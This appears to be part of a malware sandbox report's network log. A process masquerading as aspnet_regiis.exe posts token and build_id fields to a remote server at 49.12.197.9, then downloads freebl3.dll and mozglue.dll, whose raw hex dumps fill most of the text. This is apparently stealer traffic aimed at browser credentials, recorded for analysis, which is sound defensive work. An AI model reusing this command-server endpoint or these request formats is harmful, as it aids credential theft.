                                                                                                                          2024-10-03 01:26:57 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------GIEBFHCAKFBGDHIDHIDBCont
                                                                                                                          2024-10-03 01:26:57 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:57 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:26:57 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2ok0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.75795749.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:58 UTC195OUTGET /freebl3.dll HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:26:58 UTC262INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:58 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 685392
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Thursday, 03-Oct-2024 01:26:58 GMT
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-03 01:26:58 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                          2024-10-03 01:26:58 UTC16384INData Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f
                                                                                                                          Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                          2024-10-03 01:26:58 UTC16384INData Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8
                                                                                                                          Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                                                          2024-10-03 01:26:59 UTC16384INData Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01
                                                                                                                          Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                          2024-10-03 01:26:59 UTC16384INData Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1
                                                                                                                          Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                          2024-10-03 01:26:59 UTC16384INData Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f
                                                                                                                          Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                          2024-10-03 01:26:59 UTC16384INData Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00
                                                                                                                          Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                          2024-10-03 01:26:59 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                                                          Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                          2024-10-03 01:26:59 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
                                                                                                                          Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                          2024-10-03 01:26:59 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                                                          Data Ascii: ,0<48%8A)$


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.75795849.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:27:00 UTC195OUTGET /mozglue.dll HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:00 UTC262INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:00 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 608080
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Thursday, 03-Oct-2024 01:27:00 GMT
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-03 01:27:00 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                          2024-10-03 01:27:00 UTC16384INData Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00
                                                                                                                          Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNP
                                                                                                                          2024-10-03 01:27:01 UTC16384INData Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c
                                                                                                                          Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                                                          2024-10-03 01:27:01 UTC16384INData Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9
                                                                                                                          Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                          2024-10-03 01:27:01 UTC16384INData Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89
                                                                                                                          Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                          2024-10-03 01:27:01 UTC16384INData Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc
                                                                                                                          Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                          2024-10-03 01:27:01 UTC16384INData Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34
                                                                                                                          Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                                                          2024-10-03 01:27:01 UTC16384INData Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c
                                                                                                                          Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
